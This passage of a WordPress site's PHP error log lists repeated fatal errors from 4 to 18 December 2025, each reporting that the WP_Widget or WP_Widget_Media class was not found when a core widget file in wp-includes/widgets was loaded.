  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[04-Dec-2025 22:52:24 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[04-Dec-2025 22:54:31 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[04-Dec-2025 22:59:17 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[04-Dec-2025 23:08:38 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[05-Dec-2025 01:11:25 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[05-Dec-2025 01:13:07 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[05-Dec-2025 07:36:10 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[05-Dec-2025 11:35:36 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[05-Dec-2025 20:02:31 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[05-Dec-2025 20:11:41 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[05-Dec-2025 20:36:24 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[05-Dec-2025 20:46:01 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[05-Dec-2025 21:06:15 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[05-Dec-2025 23:10:59 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[06-Dec-2025 02:23:52 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[06-Dec-2025 04:07:13 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[06-Dec-2025 04:57:23 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[06-Dec-2025 04:58:31 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[06-Dec-2025 15:48:39 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[07-Dec-2025 00:21:52 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[07-Dec-2025 08:35:36 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[07-Dec-2025 10:35:17 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[07-Dec-2025 18:04:30 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[07-Dec-2025 22:23:45 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[08-Dec-2025 01:00:23 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[08-Dec-2025 02:42:13 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[08-Dec-2025 06:02:52 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[08-Dec-2025 12:12:51 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[08-Dec-2025 12:27:36 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[08-Dec-2025 12:32:19 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[08-Dec-2025 12:41:26 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
[08-Dec-2025 12:50:41 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[08-Dec-2025 12:59:20 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[08-Dec-2025 14:14:06 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[08-Dec-2025 18:02:06 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[08-Dec-2025 18:02:39 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[08-Dec-2025 18:05:56 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[08-Dec-2025 18:08:15 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[08-Dec-2025 19:47:20 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[08-Dec-2025 20:35:51 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[08-Dec-2025 20:36:25 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[08-Dec-2025 20:40:12 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[08-Dec-2025 21:04:55 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[08-Dec-2025 21:09:05 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[08-Dec-2025 22:16:07 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[08-Dec-2025 22:16:44 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[09-Dec-2025 00:06:18 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[09-Dec-2025 01:58:28 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[09-Dec-2025 02:30:51 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[09-Dec-2025 05:16:56 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[09-Dec-2025 08:16:44 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[09-Dec-2025 08:26:31 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[09-Dec-2025 10:01:50 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[09-Dec-2025 10:08:10 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[09-Dec-2025 10:08:33 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[09-Dec-2025 14:27:09 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[09-Dec-2025 17:12:05 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[09-Dec-2025 22:53:02 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[10-Dec-2025 02:52:01 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[10-Dec-2025 04:37:52 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[10-Dec-2025 05:20:09 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[10-Dec-2025 08:42:32 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[10-Dec-2025 09:35:14 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[10-Dec-2025 18:09:30 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[10-Dec-2025 18:55:06 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[10-Dec-2025 21:16:16 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[11-Dec-2025 11:48:43 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[11-Dec-2025 21:13:53 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[11-Dec-2025 22:42:11 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[12-Dec-2025 02:52:55 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[12-Dec-2025 09:33:25 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[12-Dec-2025 18:14:11 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[13-Dec-2025 01:34:18 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[13-Dec-2025 02:01:32 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[13-Dec-2025 12:22:39 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[14-Dec-2025 02:34:26 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[14-Dec-2025 04:40:12 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[14-Dec-2025 09:01:34 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[14-Dec-2025 12:47:20 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[14-Dec-2025 13:43:01 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[14-Dec-2025 14:43:50 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[14-Dec-2025 15:40:21 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[14-Dec-2025 19:24:53 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[15-Dec-2025 06:09:57 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[15-Dec-2025 20:03:25 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[16-Dec-2025 01:10:17 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[16-Dec-2025 03:33:29 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[16-Dec-2025 09:02:57 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[16-Dec-2025 10:33:05 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[16-Dec-2025 13:44:38 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[17-Dec-2025 01:03:19 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[17-Dec-2025 02:39:08 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[17-Dec-2025 02:55:46 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[17-Dec-2025 04:17:14 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[17-Dec-2025 19:41:37 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[17-Dec-2025 19:44:53 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[17-Dec-2025 23:02:45 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[18-Dec-2025 00:02:53 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
